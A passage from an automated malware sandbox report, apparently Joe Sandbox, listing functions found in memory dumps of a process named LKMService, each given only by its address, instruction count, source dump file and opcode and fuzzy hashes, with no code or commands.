Instruction Fuzzy Hash: 1701DB31509344BAE7148F29DD847A7BFA9EF41324F1CC52AED494A196CB79D8C0CAB1

Function 025A0CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef88bce93950a1d4a71ea7555753711647bba53720fc8804cbd77500d238f83
Instruction ID: e07f75f7186ab86bff77a80b01b51dea71c306b40d4164dfecf5d4831e84362f
Opcode Fuzzy Hash: bef88bce93950a1d4a71ea7555753711647bba53720fc8804cbd77500d238f83
Instruction Fuzzy Hash: 2F011E32D1061AABCB14DFA9E8404DDFBB9FF99310F158626E521B7260EB742546CB90

Function 025A2911 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc1f4365b8e0f0f1205aa3697cdc724424c13a3a28678d620b8e567ea985d634
Instruction ID: f349834fbd99f10452cf46f6885495641c62463fe03cdc917921ed662fe985e2
Opcode Fuzzy Hash: cc1f4365b8e0f0f1205aa3697cdc724424c13a3a28678d620b8e567ea985d634
Instruction Fuzzy Hash: 7A01A732D1060BABCB04DBE8EC405DDF776EFC5310F258662E121B7260EB70259ACB60

Function 025A2001 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6d6ad26e1bdf165a8678b73be451bb313291009e1195e5ff6ef24ed63571e6
Instruction ID: b97082dd6479c0578bcc52cf260a7cbedb741ca08f280e93826abae3b7fad75a
Opcode Fuzzy Hash: bf6d6ad26e1bdf165a8678b73be451bb313291009e1195e5ff6ef24ed63571e6
Instruction Fuzzy Hash: C001D432D0060A8BCF00CBB8DC445DDFBB2EFC9300F158666D111B72A0EB74259ACBA0

Function 025A6C80 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6fe19683bf7f3d1b0d19ab198ead1cdaf42110f3aafc154e4f00188cbc1ba5
Instruction ID: a771513026143e871e760455d875b14a6e7518201dd51276de6bc406076159f9
Opcode Fuzzy Hash: ef6fe19683bf7f3d1b0d19ab198ead1cdaf42110f3aafc154e4f00188cbc1ba5
Instruction Fuzzy Hash: 4E016D32C0161A97CF00DBA8DC406CDFB76EFD5321F690B61E10177160EB74368AC6A1

Function 025A0998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1a559c51430c26d9f22b5dfd74616a0e5e8251a23b8bf16f539cddbb0175ac
Instruction ID: 0a9bdac4056580b16b93ae342286ed3de957a5d69cf6b34afd6d95b2d10dd1cb
Opcode Fuzzy Hash: 6e1a559c51430c26d9f22b5dfd74616a0e5e8251a23b8bf16f539cddbb0175ac
Instruction Fuzzy Hash: 0711D639500246DFDB05FF79EA99949BBB1FB44701B10C6A8D4059733DEB34AA55CB80

Function 025A1ED0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83d734d60304604770b0fc3f8514910518576a90693aa6eaacf82c540be1581
Instruction ID: a5d925659149364f6f4f0b1d4a7209a811746ed3b83c226e1dfeffb3d20f3f1b
Opcode Fuzzy Hash: d83d734d60304604770b0fc3f8514910518576a90693aa6eaacf82c540be1581
Instruction Fuzzy Hash: 8A016D32D1464B97CB109BB9CC415EEFF76EFCA320F694661E21077160EB70219ACBA1

Function 025A73EA Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfab6e8958ccf2b0a1c5fc528b137d7603bce6ebb582831380a823897506c4db
Instruction ID: de756a39a34f2a2a92f8fe9c615d51de7e231a197caad74beb76e63a961c4a73
Opcode Fuzzy Hash: dfab6e8958ccf2b0a1c5fc528b137d7603bce6ebb582831380a823897506c4db
Instruction Fuzzy Hash: AF01C970A006158FDB09CF69D89885DFBF3BF89214B15C1A5D4099F262DB34ED42CB51

Function 025A59F9 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: affb7b1174aeabf4be7738414b9c3d5a15de75f0a443f80500ce4d59c3f44a38
Instruction ID: 91f0b2c234a1cb99943a49fd54acacf92b539fa1563bd935d1fb51c24985d562
Opcode Fuzzy Hash: affb7b1174aeabf4be7738414b9c3d5a15de75f0a443f80500ce4d59c3f44a38
Instruction Fuzzy Hash: 3B01AD32D1061BA6CB00DBA5EC449DDF776EFC5310F554621E100B7260E774228AC660

Function 025A22A0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb51784353864614789453972640c630cbeffc22161a3ce2c6e9a9ce8043dadf
Instruction ID: 39032b5007de5de14ba1f8aad21bc684d45c4fe33f3c09374b56ecce7f246a3a
Opcode Fuzzy Hash: eb51784353864614789453972640c630cbeffc22161a3ce2c6e9a9ce8043dadf
Instruction Fuzzy Hash: 65016D32D1060B97CF04DBB9D8004DEFBB6EFC9310F158666D111B7160EB70258ACBA0

Function 025A2010 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e0af7605353785907de6a54cf104d8bd459b5018f302e12838f18a74b0b74fe
Instruction ID: 5e51cbfd6fc06ba726161d7a3075f62679e8d8e0379ce578c9d51b48dc7269f4
Opcode Fuzzy Hash: 6e0af7605353785907de6a54cf104d8bd459b5018f302e12838f18a74b0b74fe
Instruction Fuzzy Hash: 56018132D1060B97CF04DBB9D8004DEFBB6EFC9310F158666D111B7160EB70259ACBA0

Function 025A5A79 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ee30972d5321d86ec8dc4bf517febbf92aaf8bf7878c2a51c8add3bcba5eaf
Instruction ID: 75b46b931dd32d36e38231a47cb44849b1b63c811e418348bd0a8f8381031015
Opcode Fuzzy Hash: 19ee30972d5321d86ec8dc4bf517febbf92aaf8bf7878c2a51c8add3bcba5eaf
Instruction Fuzzy Hash: 4BF08B72E1010987DF009768C8659EFBFB5AF44300F448925D013FB354EE709A09CBD1

Function 025A1F50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b391653c14c5ef2d2b03407fdc12655514f76723ad22473c57a3e6629c038f29
Instruction ID: 1e8675f6e5642744765e9b9481b65f0ac0d4320d3e111dda5dd28069e39b4617
Opcode Fuzzy Hash: b391653c14c5ef2d2b03407fdc12655514f76723ad22473c57a3e6629c038f29
Instruction Fuzzy Hash: 30F0F67291014A9BDB159B74C966AEFBBB59F84300F488526D102F7354EF70AA0686E1

Function 025A2888 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e341ffe2af380a32cc9ed3554882f282478d1ec107e2ffee0d5f3addfdde155
Instruction ID: db57de2d596b5f891719fc232bf9bf990539154f230b11716615d37a11a64501
Opcode Fuzzy Hash: 8e341ffe2af380a32cc9ed3554882f282478d1ec107e2ffee0d5f3addfdde155
Instruction Fuzzy Hash: 9AF04072D142098BDF118B24C9266EFBFA6AF44310F044926D002FB344DE70AA068AE2

Function 025A2A09 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 395d7a85438bc858945f7f9013dc40899f08e26f1eadbab303bb141e42a76642
Instruction ID: 8afcafa626b373fe50f3de8b7f64de6bcfb2a6d4aed48cb22b920214e62f44bc
Opcode Fuzzy Hash: 395d7a85438bc858945f7f9013dc40899f08e26f1eadbab303bb141e42a76642
Instruction Fuzzy Hash: E9F02B72E1010997DF149B64C9666EFBBB69F44310F448925C503FB354DF70A606D7D1

Function 025A2088 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e837a2200701eae5ad2a66b41d3c8e9be8b5c2c1f77a2aca20048b8f9967b29f
Instruction ID: c4d02e219c82af8b5193ddc18ff47a86fddeb44e01cbeee98c080451fc78bf48
Opcode Fuzzy Hash: e837a2200701eae5ad2a66b41d3c8e9be8b5c2c1f77a2aca20048b8f9967b29f
Instruction Fuzzy Hash: D7F0467291020957DB058B24C5166EFBFB6AB44300F488426C002FB348DE70AA07C6D1

Function 025A68A0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc09edb658b1ca29c5fba2aa186f6860964498f70edcd64d9d8e59f0655b0701
Instruction ID: d82740acb8d5fe682f7cf36d35f586d3636edec5be7f180f4dde6dfe718419f3
Opcode Fuzzy Hash: cc09edb658b1ca29c5fba2aa186f6860964498f70edcd64d9d8e59f0655b0701
Instruction Fuzzy Hash: 37F03132D5070F97CB049BA9D8444DEBB76EFD9320F654651E510771A4EB7021CACBA1

Function 025A0D51 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75b6fd4bac88d578d8e84af9d934cb10bc3b73c516c9d8f496d1b1741e151e54
Instruction ID: 63e7d971e2c07f95d02c2021785edc384a0bc0949060aec79251b03229890ca9
Opcode Fuzzy Hash: 75b6fd4bac88d578d8e84af9d934cb10bc3b73c516c9d8f496d1b1741e151e54
Instruction Fuzzy Hash: 4FF04C72E152459FDB05D774C925AEFBFB25F84300F09896AC002FB694CE74590ACB95

Function 025A0901 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 687ba08c402c8271f80fae9bf161b8f76d86fc948229ab8cacee2435acae42ed
Instruction ID: 69d7f7e02617de20c735f40365f2d756c48c2ba1b984123dfecba461ff7b4157
Opcode Fuzzy Hash: 687ba08c402c8271f80fae9bf161b8f76d86fc948229ab8cacee2435acae42ed
Instruction Fuzzy Hash: 19F04672A102499BEB15AB34C525AEFBFB66F81300F054926C402FB294EE70590ACBD2

Function 025A6D01 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a28ac887c984007560ec21365b973c475f016fba0a1795141fd3a1b7f2a272
Instruction ID: 100a2cdf2484197bca449d47528fd0a008af88d2ff2c83916b56d457b059cacb
Opcode Fuzzy Hash: 91a28ac887c984007560ec21365b973c475f016fba0a1795141fd3a1b7f2a272
Instruction Fuzzy Hash: 54F08B72D1010887CF049B64C9526EFBBB5EF44300F084925C502FB350DF709502C6DA

Function 025A6919 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec55f7d7c77f725945f2272327d836dd69eee83c6d5f7ba316989dae0cf045f1
Instruction ID: c8a11626145f8c23d3c9b1b312e441c278a8a7c04054279c1648bca2568dcf37
Opcode Fuzzy Hash: ec55f7d7c77f725945f2272327d836dd69eee83c6d5f7ba316989dae0cf045f1
Instruction Fuzzy Hash: 6AF02B7290020D9BDF14DB64C5266EFBFB5AF84700F0844268012F7354DE749A06C7D6

Function 00D1D160 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4132485646.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d1d000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7f1bedb7700f2d50c04c2abc75cde65a2337074065c833874eec97c51051d9
Instruction ID: 820b91795defbe52f24975d7454dded832ad53d4ccebfcc45b52f0e9c34c4188
Opcode Fuzzy Hash: ef7f1bedb7700f2d50c04c2abc75cde65a2337074065c833874eec97c51051d9
Instruction Fuzzy Hash: D8F0C871408344AAE7148A15DC84762FFA8EB50334F18C45AED090E286C3759880CA70

Function 025A1EE0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13df163217d1e2e6a7b5d6dd07a485382c359a626a3e92a5205b9ea9a450bbe3
Instruction ID: 98b4d6c27ce549771e69893add79b2480f92e903d98b6e6e87226af2a5956c16
Opcode Fuzzy Hash: 13df163217d1e2e6a7b5d6dd07a485382c359a626a3e92a5205b9ea9a450bbe3
Instruction Fuzzy Hash: C7F04F32D1060B96CB10DBA9C8404EEFBBAEFCA320F594651E11077160EB7021CACBA1

Function 025A1799 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92f2e3d55cba0ccf85be5c41ee4d5199dda342d389deeb76b1e77f0cbc2b3cc5
Instruction ID: 4f5c17f498f086041c8aab4082235c35b5fb75ad032d45477b9ce51392d0f6ee
Opcode Fuzzy Hash: 92f2e3d55cba0ccf85be5c41ee4d5199dda342d389deeb76b1e77f0cbc2b3cc5
Instruction Fuzzy Hash: 88F0E0313043406FC3075778A91159D7F93DDC2210305857EE045DB7A5DE649D49C7B0

Function 025A2A18 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100f0fb289949d4e28a45e7736509d82745c0a58b3e57e935f8415367eab0474
Instruction ID: 7f39acd6343706ef8e6c245eb75fdffd0e6881a7a2c75794e5146d4211e7062a
Opcode Fuzzy Hash: 100f0fb289949d4e28a45e7736509d82745c0a58b3e57e935f8415367eab0474
Instruction Fuzzy Hash: C4F0E971E1010997DB14DB64C5265EFBFB69F44300F044825C403F7354DEB06906C6D5

Function 025A5A88 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ba838b0056de960ddbf34035d2e5a2519eb817bab41268ec2e8f134e0a9864
Instruction ID: cda215012dd8bdecaf9cf84f6655a1fd2d7246fd11c81a3e339fd53184debbfa
Opcode Fuzzy Hash: 01ba838b0056de960ddbf34035d2e5a2519eb817bab41268ec2e8f134e0a9864
Instruction Fuzzy Hash: BBF0E971E1010997DF14DB64C5659EFBBB6AF44300F444425D403F7354EE70590A8AD1

Function 025A2898 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f621690d28c9b60102de58e30cae35fbde516a7bcacff66bc0daf53f146e1b
Instruction ID: 058fce55a7f4813d149430d97ac53190adcf3acf0bf893d0ccd628e366c6f555
Opcode Fuzzy Hash: 83f621690d28c9b60102de58e30cae35fbde516a7bcacff66bc0daf53f146e1b
Instruction Fuzzy Hash: E0F0E272E1420D9BDB14DB64C5269EFBBB6AF84300F048926D402FB354DE70A9068AD2

Function 025A6D10 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50dd0988f9babf18b8446260820fea7040f454a62b9730feadf6874a3a870bd6
Instruction ID: f8bafdcb94aa728f2568c2cd5c5da4490244f4e19323514a6ef62957575b8300
Opcode Fuzzy Hash: 50dd0988f9babf18b8446260820fea7040f454a62b9730feadf6874a3a870bd6
Instruction Fuzzy Hash: DDF0E971D1010997DF14DB64C5655EFBBB6AF44300F044925D002FB354DE705906C6D6

Function 025A0910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc339052147e2b86df248c740bab0ebb5ce1b3be5650ee6f691991f36fb9fe0a
Instruction ID: 92e48d11a5ea856def22ed8c859cf7e0a5057eb449786fbb5539a4f435662f69
Opcode Fuzzy Hash: bc339052147e2b86df248c740bab0ebb5ce1b3be5650ee6f691991f36fb9fe0a
Instruction Fuzzy Hash: C3F0E972E1010D9BDB14DB64C565AEFBBB66F84300F054926D402F7394DE705906C6D5

Function 025A45CE Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f14233a0a37e3a1b52eea8423c45164c12aacc24abd478a14507a5ba2a8d7d4
Instruction ID: 6d12e21df5e1611c3261143858e12d2e9734179ed1096f36392fd9fdce335a29
Opcode Fuzzy Hash: 8f14233a0a37e3a1b52eea8423c45164c12aacc24abd478a14507a5ba2a8d7d4
Instruction Fuzzy Hash: 6BF01DB5A006498FDB15CF9DD48199CBFF1FF89220F1982A1E059DB3A1D7309882CB50

Function 025A082D Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83486903195365ff9031344c806ed2dfa9463c6a3514692e08f5c6be5d67bdd1
Instruction ID: 33115ff7a77f46a21bae4848f63154b6d37a8f95d8624c314192451a6f8289c6
Opcode Fuzzy Hash: 83486903195365ff9031344c806ed2dfa9463c6a3514692e08f5c6be5d67bdd1
Instruction Fuzzy Hash: F4F0826190E3C4AFDB13CBB8882569C7FB0AF47100F2A44CBE4C4DB1A3C2244D19C766

Function 025A2998 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0253f81ae5c0b707057e3bb1a900662a656adc5cd09154c6a9681d119ffd5715
Instruction ID: 08bea9c5441cab682e6a4fe4111f242cb162dbde4511b98a9b4bab93b2e82e6c
Opcode Fuzzy Hash: 0253f81ae5c0b707057e3bb1a900662a656adc5cd09154c6a9681d119ffd5715
Instruction Fuzzy Hash: FEF09035115244DFCB02EB7CE9519ACBBB6AF86200B0485A9C0059B26AEA305F08CB95

Function 025A5AFC Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e778c439bc597f3e824ded394a89dc09d660030c6bc9e2a8edabe67c7bebeda2
Instruction ID: 25598e68f18470bf9db6b7049f44085f72504e32c7ed854ae9ef7e2b5218df3a
Opcode Fuzzy Hash: e778c439bc597f3e824ded394a89dc09d660030c6bc9e2a8edabe67c7bebeda2
Instruction Fuzzy Hash: 35E02BA0E062468FE300572099B7ABE7F61FB11241F840485D003D7164EA68850BD6A5

Function 025A29A8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a3c86c4208c1a201878025ab8a2006248d5aa3e06f20f4a2b4dd329f4978fdc
Instruction ID: f5160d60fd6d1d657ef8243ebf071023aac465ecf0f40f226aa7b27369b21e4b
Opcode Fuzzy Hash: 4a3c86c4208c1a201878025ab8a2006248d5aa3e06f20f4a2b4dd329f4978fdc
Instruction Fuzzy Hash: C5F03031611108DFCB01FB7CF9519ADB7B6FB84700B50C66880099B269EF306E44DB90

Function 025A1E9B Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bece17be7916b3b5d305622725237d96b91e96a9291a0cb238503375ec9c5ac9
Instruction ID: c2b9c59daa2205d891c7e7f769d428cb6afefe69ae5728badfde4487a7a1201c
Opcode Fuzzy Hash: bece17be7916b3b5d305622725237d96b91e96a9291a0cb238503375ec9c5ac9
Instruction Fuzzy Hash: 71D05E2140F3C28FCB130778DC667927F608F23204F0945D6C4C0CA367C9044855DB72

Function 025A1818 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a887f8a8d37d97a9866a96e3613a71f7c753a2c73f60aa2111e5d7cf815e5297
Instruction ID: 842725444ace5c5fd7fa9243414639084ee8a5d0050d80559223f7e3afc3b6e6
Opcode Fuzzy Hash: a887f8a8d37d97a9866a96e3613a71f7c753a2c73f60aa2111e5d7cf815e5297
Instruction Fuzzy Hash: 91D05E323143154BCB2866B8A92276E73DAAFC97A9B14447ED50DC7684E976D8408FC8

Function 025A1858 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b99b08b3ca1dc509bee788992022a06e4cc990384507aca3fd152c6395c9ed1
Instruction ID: da8f7267e1e7bed255d8969d3dd88300c421375934e7e4236855c3306deb7110
Opcode Fuzzy Hash: 4b99b08b3ca1dc509bee788992022a06e4cc990384507aca3fd152c6395c9ed1
Instruction Fuzzy Hash: ECD0A712714537030605316E502152F16CF67C5A70710802AD10DD7340DD849C0247FA

Function 025A0848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d80e0d0d99eff569704d0e8d95d66dd942391986e6c7cdd78fb903c7589094
Instruction ID: 88be3f6421169977b0924659390a4ff06fd55ea2095f4942565dfc148fdfb1de
Opcode Fuzzy Hash: c6d80e0d0d99eff569704d0e8d95d66dd942391986e6c7cdd78fb903c7589094
Instruction Fuzzy Hash: 21D017B1905348AFDB15CFA4C90575D7BB8AB45280F204595E848D7245DB319E11C795

Function 025A34D2 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4134210690.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_25a0000_LKMService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 342254d578ef738c59c8e50f83b448b6328a76d1b86fc517cc899276087a0328
